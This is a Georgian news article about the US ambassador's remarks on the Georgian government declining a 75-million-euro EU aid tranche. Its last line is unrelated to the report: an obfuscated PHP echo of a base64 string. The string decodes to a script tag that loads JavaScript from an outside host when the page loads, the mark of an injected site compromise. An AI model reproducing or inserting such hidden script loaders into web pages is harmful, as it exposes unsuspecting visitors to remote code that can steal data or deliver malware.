celsiusi
ავერსი შნაიდერი
როგორც საქართველოში აშშ-ის ელჩმა კელი დეგნანმა განაცხადა, EU-ს 75 მლნ ევროს დახმარებასთან დაკავშირებით მთავრობის განცხადება სიურპრიზი იყო. 
 

დეგნანის თქმით, აღნიშნულ ფაქტს ვაშიგნტონი მხედველობაში მიიღებს. ამ შემთხვევაში 75 მლნ ევრო რეფორმების განხორციელებასთან არ უნდა იყოს დაკავშირებული. 

 
„75 მილიონ ევროსთან დაკავშირებით მთავრობის განცხადება ჩვენთვის ცოტათი სიურპრიზი იყო. განსაკუთრებით საინტერესოა პანდემიის და უმუშევრობის დროს. რა თქმა უნდა, ამას გარკვეულწილად მხედველობაში მიიღებს ვაშინგტონიც, რადგან ამავე დროს გასათვალისწინებელია ისიც, რომ ის რეფორმები, რომელიც მართლა უნდა განხორციელებულიყო და ამაზე დიდი მუშაობა მიმდინარეობდა საქართველოსა და ევროკავშირს შორის, უნდა გაგრძელდეს. ამ შემთხვევაში 75 მლნ ევრო რეფორმების განხორციელებასთან არ უნდა იყოს დაკავშირებული, თუმცა კონგრესი უყურებს როგორ მიმდინარეობს ეს პროცესები. ჩვენ საკმაოდ ახლო კოორდინაციაში ვართ საქართველოს მთავრობასთან და ვიცით, რა სჭირდება საქართველოს. 75 მლნ ევრო ცოტა არ არის“, - განაცხადა ელჩმა.
 
შეგახსენებთ, რომ საქართველოს მთავრობა უარი განაცხადა, ევროკავშირის 150 მლნ ევროიანი მაკროფინანსური დახმარების მეორე ნაწილზე - 75 მლნ ევროს მიღებაზე.
 
1206
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");